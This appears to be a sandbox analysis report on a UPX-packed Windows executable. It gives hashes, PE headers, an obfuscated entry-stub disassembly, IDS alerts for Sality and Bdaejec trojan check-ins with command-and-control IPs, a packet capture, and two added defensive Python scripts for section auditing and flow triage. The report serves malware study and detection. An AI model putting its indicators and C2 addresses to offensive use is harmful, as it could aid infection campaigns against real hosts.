                              SHA256:775939b8bf22ee4999cebd8d9e1525ca9417464b5fe6ed1778f0a7b43d07d6ef
                              SHA512:2c730917acab6344b187a2e208bd0753f78c4afd4804a209b3af034a1c8d90e50f7ebc3a00556bd79dac2fa385c2376622d88ad65f1ef4ee5e8fcce5af23a5cb
                              SSDEEP:98304:k2ONi+29K/WE9PhBGjohAInvqIKofZP5UyeAQQm4OTb12pcFS+fRXN/f0ykSJf+P:k4+SK9hh4M5v9fZP5UNDcOnMp0xN/8dn
                              TLSH:3936333681D5A2F6F4AA9D70633CF8D2D507312A3BE232711D06C9DA40B9EE2D4C9A57
                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......K..Y............`.......`.......t.......Y...#.......#...................m.......9...}...9...........c..........................
                              Icon Hash:33e8f499f8ec6933
                              Entrypoint:0xd63000
                              Entrypoint Section:pu
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              DLL Characteristics:
                              Time Stamp:0x6000113C [Thu Jan 14 09:39:08 2021 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:a6fac039708cc3b1dc87b477f4e93cc1
                              Instruction
                              sbb al, dh
                              push edx
                              push esi
                              jne 00007F60E4F78BECh
                              test al, 00000073h
                              adc ebx, 55DBBF92h
                              cmp ebp, 0000A53Dh
                              js 00007F60E4F78BECh
                              xchg cl, ch
                              sbb esi, 462B1CD7h
                              and eax, ebp
                              jmp 00007F60E4F78BE4h
                              add dh, dl
                              and edi, edi
                              dec edi
                              mov ecx, edx
                              imul esi, ecx, ED00E6CFh
                              dec ebp
                              mov cl, dl
                              test cl, 00000072h
                              test ebx, edi
                              jc 00007F60E4F78BECh
                              xchg ecx, ecx
                              lea ecx, dword ptr [0472A919h]
                              or ecx, eax
                              or cl, cl
                              lea ecx, dword ptr [509E0C08h]
                              mov ebp, ecx
                              inc ch
                              imul ecx, ebx, DD308976h
                              imul ecx, ecx, 478F617Dh
                              mov cl, ch
                              test al, FFFFFFEFh
                              push ebp
                              jne 00007F60E4F78BF0h
                              test al, ch
                              test esi, 238CA071h
                              imul ecx, edx, 9D350FF7h
                              pop esi
                              xchg cl, ch
                              test edx, 4D24425Ah
                              mov ecx, esi
                              mov ebp, FE018C06h
                              lea edi, dword ptr [esi]
                              imul ecx, ecx, 72B1634Dh
                              test bl, bl
                              movsx ebp, ch
                              mov ecx, esi
                              test ebx, ebp
                              lea edx, dword ptr [edi]
                              jnc 00007F60E4F78BE8h
                              mov ecx, ecx
                              imul esi, esi
                              mov ch, ch
                              mov eax, edx
                              movsx esi, cx
                              sub edx, 286F0A61h
                              lea ebx, dword ptr [eax]
                              lea ebp, dword ptr [4DE29DA2h]
                              jmp 00007F60E4F78BECh
                              mov ebx, 0392B612h
                              test bh, FFFFFF89h
                              xor edi, ebx
                              sbb edx, edx
                              inc edx
                              test edi, ecx
                              Programming Language:
                              • [C++] VS98 (6.0) SP6 build 8804
                              • [ C ] VS98 (6.0) SP6 build 8804
                              • [C++] VS98 (6.0) build 8168
                              • [ C ] VS98 (6.0) build 8168
                              • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x94dcd8 | 0x424 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x94b000 | 0x2cd8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x47a000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x47b000 | 0x4d0000 | 0x4cfc00 | 72d5d09dd48c8b3129f439ece8b138fc | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x94b000 | 0x18000 | 0x18000 | 4f80a8fcfc7cfec1847b0c75b6152ab8 | False | 0.89459228515625 | data | 7.617344200663995 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pu | 0x963000 | 0x18000 | 0x18000 | b9f7188d7e80a9084783d2046e29c238 | False | 0.924591064453125 | data | 7.7594391065047255 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
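The section table is what the "writeable .text section" and "changes PE section rights" findings rest on: every section is readable, writable and executable, UPX0 has a virtual size of 0x47a000 but no bytes on disk (the unpacked image is written there at runtime), and the entry point (0xd63000 minus the 0x400000 image base, RVA 0x963000) sits in the last section, which carries the non-standard name "pu" rather than a UPX stub name. The following is an added example, not part of the Joe Sandbox report and not the sample's own code; it rebuilds the four IMAGE_SECTION_HEADER records from the values in the table above (PointerToRawData is not shown in the report, so the file offsets are assumed and unused), parses them with struct as one would from a real file and runs the checks an analyst applies by hand.

```python
import struct
from dataclasses import dataclass

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Section names a linker normally emits; anything else deserves a look.
STANDARD_SECTION_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".bss",
                          ".rsrc", ".reloc", ".tls", ".pdata", ".crt", ".textbss",
                          "CODE", "DATA", "BSS"}

IMAGE_BASE = 0x400000      # from the report's PE header
ENTRYPOINT_VA = 0xd63000   # from the report's PE header
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER, 40 bytes


def _hdr(name, vsize, va, raw_size, raw_ptr, chars):
    return SECTION_HEADER.pack(name.encode("ascii").ljust(8, b"\0"),
                               vsize, va, raw_size, raw_ptr, 0, 0, 0, 0, chars)


# Constructed sample: the section headers of 1.0.0.2.exe rebuilt from the
# report's section table. PointerToRawData (5th field) is assumed: sections
# laid out back to back after a 0x400-byte header; no check below uses it.
SECTION_TABLE = b"".join([
    _hdr("UPX0", 0x47a000, 0x001000, 0x000000, 0x000000, IMAGE_SCN_CNT_UNINITIALIZED_DATA | RWX),
    _hdr("UPX1", 0x4d0000, 0x47b000, 0x4cfc00, 0x000400, IMAGE_SCN_CNT_INITIALIZED_DATA | RWX),
    _hdr(".rsrc", 0x018000, 0x94b000, 0x018000, 0x4d0000, IMAGE_SCN_CNT_INITIALIZED_DATA | RWX),
    _hdr("pu", 0x018000, 0x963000, 0x018000, 0x4e8000, IMAGE_SCN_CNT_CODE | RWX),
])


@dataclass
class Section:
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int
    raw_pointer: int
    characteristics: int

    def contains_rva(self, rva):
        end = self.virtual_address + max(self.virtual_size, self.raw_size)
        return self.virtual_address <= rva < end

    @property
    def writable_and_executable(self):
        return bool(self.characteristics & IMAGE_SCN_MEM_WRITE) and \
            bool(self.characteristics & IMAGE_SCN_MEM_EXECUTE)


def parse_section_headers(blob):
    """Decode consecutive IMAGE_SECTION_HEADER records (the table that
    follows the optional header in a PE file)."""
    sections = []
    for off in range(0, len(blob) - SECTION_HEADER.size + 1, SECTION_HEADER.size):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = \
            SECTION_HEADER.unpack_from(blob, off)
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                vsize, va, raw_size, raw_ptr, chars))
    return sections


def section_for_rva(sections, rva):
    """The section whose virtual range covers an RVA, or None (headers)."""
    return next((s for s in sections if s.contains_rva(rva)), None)


def audit_sections(sections, entry_rva):
    """The packer/self-modifying-code indicators an analyst checks first."""
    entry = section_for_rva(sections, entry_rva)
    return {
        "wx": [s.name for s in sections if s.writable_and_executable],
        "no_raw_data": [s.name for s in sections if s.raw_size == 0 and s.virtual_size > 0],
        "nonstandard_names": [s.name for s in sections if s.name not in STANDARD_SECTION_NAMES],
        "entry_section": entry.name if entry else None,
        "entry_in_last_section": entry is not None and entry is sections[-1],
    }


if __name__ == "__main__":
    secs = parse_section_headers(SECTION_TABLE)
    for k, v in audit_sections(secs, ENTRYPOINT_VA - IMAGE_BASE).items():
        print(f"{k:22} {v}")
```

Run against a real file, the same functions take the bytes at the offset given by the COFF header (e_lfanew + 24 + SizeOfOptionalHeader) for NumberOfSections records; the import directory RVA 0x94dcd8 from the table above resolves to .rsrc, which is where UPX places the rebuilt import table.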
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
TEXTINCLUDE | 0x931fc4 | 0xb | data | Chinese | China | 1.7272727272727273
TEXTINCLUDE | 0x931fd0 | 0x16 | data | Chinese | China | 1.4090909090909092
TEXTINCLUDE | 0x931fe8 | 0x151 | data | Chinese | China | 1.032640949554896
WAVE | 0x93213c | 0x1448 | data | Chinese | China | 0.9632126348228043
RT_CURSOR | 0x933584 | 0x134 | data | Chinese | China | 1.0357142857142858
RT_CURSOR | 0x9336b8 | 0x134 | data | Chinese | China | 1.0357142857142858
RT_CURSOR | 0x9337ec | 0x134 | data | Chinese | China | 1.0357142857142858
RT_CURSOR | 0x933920 | 0xb4 | data | Chinese | China | 1.0611111111111111
RT_CURSOR | 0x9339d4 | 0x134 | PGP Secret Sub-key - | Chinese | China | 1.0357142857142858
RT_CURSOR | 0x933b08 | 0x134 | data | Chinese | China | 1.0357142857142858
RT_BITMAP | 0x933c3c | 0x16c | data | Chinese | China | 1.0302197802197801
RT_BITMAP | 0x933da8 | 0x248 | data | Chinese | China | 1.018835616438356
RT_BITMAP | 0x933ff0 | 0x144 | data | Chinese | China | 1.0339506172839505
RT_BITMAP | 0x934134 | 0x158 | data | Chinese | China | 1.0319767441860466
RT_BITMAP | 0x93428c | 0x158 | data | Chinese | China | 1.0319767441860466
RT_BITMAP | 0x9343e4 | 0x158 | data | Chinese | China | 0.9040697674418605
RT_BITMAP | 0x93453c | 0x158 | data | Chinese | China | 1.0174418604651163
RT_BITMAP | 0x934694 | 0x158 | data | Chinese | China | 1.0261627906976745
RT_BITMAP | 0x9347ec | 0x158 | data | Chinese | China | 1.0319767441860466
RT_BITMAP | 0x934944 | 0x158 | data | Chinese | China | 1.0319767441860466
RT_BITMAP | 0x934a9c | 0x158 | data | Chinese | China | 1.0319767441860466
RT_BITMAP | 0x934bf4 | 0x5e4 | data | Chinese | China | 1.007294429708223
RT_BITMAP | 0x9351d8 | 0xb8 | data | Chinese | China | 1.059782608695652
RT_BITMAP | 0x935290 | 0x16c | data | Chinese | China | 1.0302197802197801
RT_BITMAP | 0x9353fc | 0x144 | data | Chinese | China | 1.0339506172839505
RT_ICON | 0x935540 | 0x2e8 | data | Chinese | China | 1.0147849462365592
RT_ICON | 0x935828 | 0x128 | data | Chinese | China | 1.037162162162162
RT_ICON | 0x94bfc8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.848826714801444
RT_ICON | 0x94c874 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2688 | Chinese | China | 0.36167377398720685
RT_ICON | 0x9370a0 | 0x8a8 | data | Chinese | China | 1.0
RT_ICON | 0x937948 | 0x568 | data | Chinese | China | 1.0079479768786128
RT_ICON | 0x937eb0 | 0x21de | data | Chinese | China | 0.9823529411764705
RT_ICON | 0x93a090 | 0x4228 | zlib compressed data | Chinese | China | 0.9817548417572036
RT_ICON | 0x93e2b8 | 0x25a8 | data | Chinese | China | 0.9810165975103734
RT_ICON | 0x940860 | 0x1a68 | data | Chinese | China | 0.9764792899408284
RT_ICON | 0x9422c8 | 0x10a8 | data | Chinese | China | 0.9727954971857411
RT_ICON | 0x943370 | 0x988 | data | Chinese | China | 0.9655737704918033
RT_ICON | 0x943cf8 | 0x6b8 | data | Chinese | China | 0.9808139534883721
RT_ICON | 0x9443b0 | 0x468 | data | Chinese | China | 1.0097517730496455
RT_MENU | 0x944818 | 0xc | data | Chinese | China | 1.6666666666666667
RT_MENU | 0x944824 | 0x284 | data | Chinese | China | 1.0170807453416149
RT_DIALOG | 0x944aa8 | 0x98 | OpenPGP Secret Key Version 6 | Chinese | China | 1.0723684210526316
RT_DIALOG | 0x944b40 | 0x17a | data | Chinese | China | 1.029100529100529
RT_DIALOG | 0x944cbc | 0xfa | data | Chinese | China | 1.044
RT_DIALOG | 0x944db8 | 0xea | data | Chinese | China | 1.047008547008547
RT_DIALOG | 0x944ea4 | 0x8ae | data | Chinese | China | 1.0004500450045004
RT_DIALOG | 0x945754 | 0xb2 | data | Chinese | China | 1.050561797752809
RT_DIALOG | 0x945808 | 0xcc | data | Chinese | China | 1.053921568627451
RT_DIALOG | 0x9458d4 | 0xb2 | data | Chinese | China | 1.0617977528089888
RT_DIALOG | 0x945988 | 0xe2 | data | Chinese | China | 1.0486725663716814
RT_DIALOG | 0x945a6c | 0x18c | data | Chinese | China | 1.0277777777777777
RT_STRING | 0x945bf8 | 0x50 | data | Chinese | China | 1.1375
RT_STRING | 0x945c48 | 0x2c | data | Chinese | China | 1.25
RT_STRING | 0x945c74 | 0x78 | data | Chinese | China | 1.0916666666666666
RT_STRING | 0x945cec | 0x1c4 | data | Chinese | China | 1.0243362831858407
RT_STRING | 0x945eb0 | 0x12a | data | Chinese | China | 1.0369127516778522
RT_STRING | 0x945fdc | 0x146 | data | Chinese | China | 1.0337423312883436
RT_STRING | 0x946124 | 0x40 | data | Chinese | China | 1.171875
RT_STRING | 0x946164 | 0x64 | data | Chinese | China | 1.11
RT_STRING | 0x9461c8 | 0x1d8 | data | Chinese | China | 1.0233050847457628
RT_STRING | 0x9463a0 | 0x114 | data | Chinese | China | 1.039855072463768
RT_STRING | 0x9464b4 | 0x24 | data | Chinese | China | 1.3055555555555556
RT_GROUP_CURSOR | 0x9464d8 | 0x14 | data | Chinese | China | 1.45
RT_GROUP_CURSOR | 0x9464ec | 0x14 | data | Chinese | China | 1.45
RT_GROUP_CURSOR | 0x946500 | 0x14 | data | Chinese | China | 1.45
RT_GROUP_CURSOR | 0x946514 | 0x14 | data | Chinese | China | 1.45
RT_GROUP_CURSOR | 0x946528 | 0x22 | data | Chinese | China | 1.3235294117647058
RT_GROUP_ICON | 0x94d720 | 0x14 | data | | | 1.25
RT_GROUP_ICON | 0x946560 | 0xbc | data | Chinese | China | 1.0585106382978724
RT_GROUP_ICON | 0x94661c | 0x14 | data | Chinese | China | 1.45
RT_GROUP_ICON | 0x946630 | 0x14 | data | Chinese | China | 1.45
RT_VERSION | 0x94d738 | 0x2e0 | data | Chinese | China | 0.4904891304347826
RT_MANIFEST | 0x94da1c | 0x2b9 | XML 1.0 document, ASCII text, with very long lines (697), with no line terminators | | | 0.5279770444763271
DLL | Import
ADVAPI32.dll | RegCloseKey
COMCTL32.dll |
comdlg32.dll | ChooseColorA
GDI32.dll | LPtoDP
gdiplus.dll | GdipDeletePen
imm32.dll | ImmGetContext
iphlpapi.dll | GetAdaptersInfo
KERNEL32.DLL | LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
ole32.dll | OleRun
OLEAUT32.dll | RegisterTypeLib
RASAPI32.dll | RasHangUpA
SHELL32.dll | ShellExecuteA
shlwapi.dll | PathFileExistsA
USER32.dll | GetDC
VERSION.dll | VerQueryValueA
WININET.dll | InternetOpenA
winmm.dll | PlaySoundA
WINSPOOL.DRV | ClosePrinter
WS2_32.dll | WSAGetLastError
Language of compilation system | Country where language is spoken | Map
Chinese | China |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/05/24-08:00:04.879865 | TCP | 2804830 | ETPRO TROJAN Win32.Sality.bh Checkin 2 | 49715 | 80 | 192.168.2.6 | 44.221.84.105
07/05/24-08:00:03.856779 | TCP | 2804830 | ETPRO TROJAN Win32.Sality.bh Checkin 2 | 49712 | 80 | 192.168.2.6 | 54.244.188.177
07/05/24-08:00:06.311326 | TCP | 2804830 | ETPRO TROJAN Win32.Sality.bh Checkin 2 | 49716 | 80 | 192.168.2.6 | 44.221.84.105
07/05/24-08:00:09.880391 | TCP | 2804830 | ETPRO TROJAN Win32.Sality.bh Checkin 2 | 49722 | 80 | 192.168.2.6 | 44.221.84.105
07/05/24-08:00:06.909560 | TCP | 2804830 | ETPRO TROJAN Win32.Sality.bh Checkin 2 | 49718 | 80 | 192.168.2.6 | 78.46.2.155
07/05/24-08:00:07.763277 | TCP | 2804830 | ETPRO TROJAN Win32.Sality.bh Checkin 2 | 49719 | 80 | 192.168.2.6 | 37.230.104.89
07/05/24-08:00:03.315545 | UDP | 2838522 | ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup | 63363 | 53 | 192.168.2.6 | 1.1.1.1
07/05/24-08:00:06.805804 | TCP | 2037771 | ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 80 | 49716 | 44.221.84.105 | 192.168.2.6
07/05/24-08:00:09.129606 | TCP | 2804830 | ETPRO TROJAN Win32.Sality.bh Checkin 2 | 49720 | 80 | 192.168.2.6 | 54.244.188.177
07/05/24-08:00:03.544015 | TCP | 2807908 | ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin | 49710 | 799 | 192.168.2.6 | 44.221.84.105
07/05/24-08:00:10.394245 | TCP | 2804830 | ETPRO TROJAN Win32.Sality.bh Checkin 2 | 49723 | 80 | 192.168.2.6 | 44.221.84.105
07/05/24-08:00:10.955809 | TCP | 2804830 | ETPRO TROJAN Win32.Sality.bh Checkin 2 | 49725 | 80 | 192.168.2.6 | 78.46.2.155
07/05/24-08:00:11.733848 | TCP | 2804830 | ETPRO TROJAN Win32.Sality.bh Checkin 2 | 49726 | 80 | 192.168.2.6 | 37.230.104.89
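Two things stand out in the alerts: the Bdaejec check-in goes to 44.221.84.105 on TCP 799 (a known protocol on a non-standard port), and the same host is then contacted four more times on port 80 within a few seconds, answering with the AnubisNetworks sinkhole cookie, i.e. the C2 domain now resolves to a sinkhole. Without IDS signatures, both are visible from the packet list alone once packets are grouped into client-to-server flows. The following is an added example, not part of the Joe Sandbox report; it takes a constructed extract of the capture rows below (client SYNs plus two server replies, in the report's own column order) and produces the per-server summary an analyst would build from any packet list: session count, time span, non-standard ports and short-interval repeated connections. The 60-second window and the expected-port set are assumptions chosen for this capture.

```python
import re
from datetime import datetime

# Constructed sample: rows transcribed from the report's packet table (the
# first packet of each TCP session plus two server replies), one record per
# line: timestamp, source port, dest port, source IP, dest IP.
SAMPLE_PACKETS = """\
Jul 5, 2024 08:00:03.537938118 CEST 49710 799 192.168.2.6 44.221.84.105
Jul 5, 2024 08:00:03.542771101 CEST 799 49710 44.221.84.105 192.168.2.6
Jul 5, 2024 08:00:03.838006973 CEST 49712 80 192.168.2.6 54.244.188.177
Jul 5, 2024 08:00:03.842852116 CEST 80 49712 54.244.188.177 192.168.2.6
Jul 5, 2024 08:00:04.874154091 CEST 49715 80 192.168.2.6 44.221.84.105
Jul 5, 2024 08:00:06.304564953 CEST 49716 80 192.168.2.6 44.221.84.105
Jul 5, 2024 08:00:06.904500008 CEST 49718 80 192.168.2.6 78.46.2.155
Jul 5, 2024 08:00:07.757761002 CEST 49719 80 192.168.2.6 37.230.104.89
Jul 5, 2024 08:00:09.099657059 CEST 49720 80 192.168.2.6 54.244.188.177
Jul 5, 2024 08:00:09.875143051 CEST 49722 80 192.168.2.6 44.221.84.105
Jul 5, 2024 08:00:10.369745970 CEST 49723 80 192.168.2.6 44.221.84.105
Jul 5, 2024 08:00:10.938365936 CEST 49725 80 192.168.2.6 78.46.2.155
"""

ROW = re.compile(
    r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(?P<frac>\d+) \w+ "
    r"(?P<sport>\d+) (?P<dport>\d+) (?P<src>[\d.]+) (?P<dst>[\d.]+)$")


def parse_packets(text):
    """One record per matching line. The report prints nanoseconds; datetime
    holds microseconds, so the fraction is truncated to six digits."""
    packets = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(f"{m['ts']}.{m['frac'][:6]}", "%b %d, %Y %H:%M:%S.%f")
        packets.append({"ts": ts, "sport": int(m["sport"]), "dport": int(m["dport"]),
                        "src": m["src"], "dst": m["dst"]})
    return packets


def build_flows(packets):
    """Group packets into flows keyed (client, client port, server, server port).
    The first packet seen on a 4-tuple decides which side is the client; a
    packet on the reversed tuple is attributed to that flow as a reply."""
    flows = {}
    for p in sorted(packets, key=lambda p: p["ts"]):
        fwd = (p["src"], p["sport"], p["dst"], p["dport"])
        rev = (p["dst"], p["dport"], p["src"], p["sport"])
        if rev in flows:
            flow = flows[rev]
            flow["reply_seen"] = True
        else:
            flow = flows.setdefault(fwd, {"first": p["ts"], "last": p["ts"],
                                          "packets": 0, "reply_seen": False})
        flow["packets"] += 1
        flow["last"] = max(flow["last"], p["ts"])
    return flows


def summarize_servers(flows, expected_ports=(80, 443), window_s=60.0, min_sessions=3):
    """Per (server IP, server port): session count, span of session starts and
    triage flags for non-standard ports and bursts of repeated connections."""
    servers = {}
    for (_, _, server, port), flow in flows.items():
        s = servers.setdefault((server, port), {"sessions": 0, "first": flow["first"],
                                                 "last": flow["first"], "flags": []})
        s["sessions"] += 1
        s["first"] = min(s["first"], flow["first"])
        s["last"] = max(s["last"], flow["first"])
    for (server, port), s in servers.items():
        span = (s["last"] - s["first"]).total_seconds()
        if port not in expected_ports:
            s["flags"].append(f"non-standard port {port}")
        if s["sessions"] >= min_sessions and span <= window_s:
            s["flags"].append(f"{s['sessions']} sessions in {span:.1f}s")
    return servers


if __name__ == "__main__":
    summary = summarize_servers(build_flows(parse_packets(SAMPLE_PACKETS)))
    for (server, port), s in sorted(summary.items()):
        print(f"{server}:{port:<5} sessions={s['sessions']} {', '.join(s['flags'])}")
```

Because flows are keyed on the client side, the sinkhole's reply packets (source port 80 towards 192.168.2.6) count towards the existing session instead of appearing as a second "server" on an ephemeral port, which is the usual mistake when this is done with a naive groupby on destination.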
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 5, 2024 08:00:03.537938118 CEST | 49710 | 799 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:03.542771101 CEST | 799 | 49710 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:03.543601990 CEST | 49710 | 799 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:03.544014931 CEST | 49710 | 799 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:03.548825979 CEST | 799 | 49710 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:03.838006973 CEST | 49712 | 80 | 192.168.2.6 | 54.244.188.177
Jul 5, 2024 08:00:03.842852116 CEST | 80 | 49712 | 54.244.188.177 | 192.168.2.6
Jul 5, 2024 08:00:03.855412006 CEST | 49712 | 80 | 192.168.2.6 | 54.244.188.177
Jul 5, 2024 08:00:03.856779099 CEST | 49712 | 80 | 192.168.2.6 | 54.244.188.177
Jul 5, 2024 08:00:03.862957954 CEST | 80 | 49712 | 54.244.188.177 | 192.168.2.6
Jul 5, 2024 08:00:03.986773014 CEST | 799 | 49710 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:03.986865044 CEST | 799 | 49710 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:03.987584114 CEST | 49710 | 799 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:03.998967886 CEST | 49710 | 799 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:04.004163027 CEST | 799 | 49710 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:04.635207891 CEST | 80 | 49712 | 54.244.188.177 | 192.168.2.6
Jul 5, 2024 08:00:04.635273933 CEST | 49712 | 80 | 192.168.2.6 | 54.244.188.177
Jul 5, 2024 08:00:04.635389090 CEST | 80 | 49712 | 54.244.188.177 | 192.168.2.6
Jul 5, 2024 08:00:04.635458946 CEST | 49712 | 80 | 192.168.2.6 | 54.244.188.177
Jul 5, 2024 08:00:04.653597116 CEST | 49712 | 80 | 192.168.2.6 | 54.244.188.177
Jul 5, 2024 08:00:04.658627987 CEST | 80 | 49712 | 54.244.188.177 | 192.168.2.6
Jul 5, 2024 08:00:04.874154091 CEST | 49715 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:04.878956079 CEST | 80 | 49715 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:04.879723072 CEST | 49715 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:04.879864931 CEST | 49715 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:04.884593964 CEST | 80 | 49715 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:05.376137018 CEST | 80 | 49715 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:05.376159906 CEST | 80 | 49715 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:05.381345034 CEST | 49715 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:05.596782923 CEST | 49715 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:05.604990959 CEST | 80 | 49715 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:06.304564953 CEST | 49716 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:06.309467077 CEST | 80 | 49716 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:06.311142921 CEST | 49716 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:06.311326027 CEST | 49716 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:06.316145897 CEST | 80 | 49716 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:06.805804014 CEST | 80 | 49716 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:06.805826902 CEST | 80 | 49716 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:06.806711912 CEST | 49716 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:06.826670885 CEST | 49716 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:06.831571102 CEST | 80 | 49716 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:06.904500008 CEST | 49718 | 80 | 192.168.2.6 | 78.46.2.155
Jul 5, 2024 08:00:06.909343004 CEST | 80 | 49718 | 78.46.2.155 | 192.168.2.6
Jul 5, 2024 08:00:06.909415007 CEST | 49718 | 80 | 192.168.2.6 | 78.46.2.155
Jul 5, 2024 08:00:06.909559965 CEST | 49718 | 80 | 192.168.2.6 | 78.46.2.155
Jul 5, 2024 08:00:06.914289951 CEST | 80 | 49718 | 78.46.2.155 | 192.168.2.6
Jul 5, 2024 08:00:07.565737009 CEST | 80 | 49718 | 78.46.2.155 | 192.168.2.6
Jul 5, 2024 08:00:07.565944910 CEST | 49718 | 80 | 192.168.2.6 | 78.46.2.155
Jul 5, 2024 08:00:07.757761002 CEST | 49719 | 80 | 192.168.2.6 | 37.230.104.89
Jul 5, 2024 08:00:07.763025045 CEST | 80 | 49719 | 37.230.104.89 | 192.168.2.6
Jul 5, 2024 08:00:07.763119936 CEST | 49719 | 80 | 192.168.2.6 | 37.230.104.89
Jul 5, 2024 08:00:07.763277054 CEST | 49719 | 80 | 192.168.2.6 | 37.230.104.89
Jul 5, 2024 08:00:07.768089056 CEST | 80 | 49719 | 37.230.104.89 | 192.168.2.6
Jul 5, 2024 08:00:08.504347086 CEST | 80 | 49719 | 37.230.104.89 | 192.168.2.6
Jul 5, 2024 08:00:08.504518032 CEST | 49719 | 80 | 192.168.2.6 | 37.230.104.89
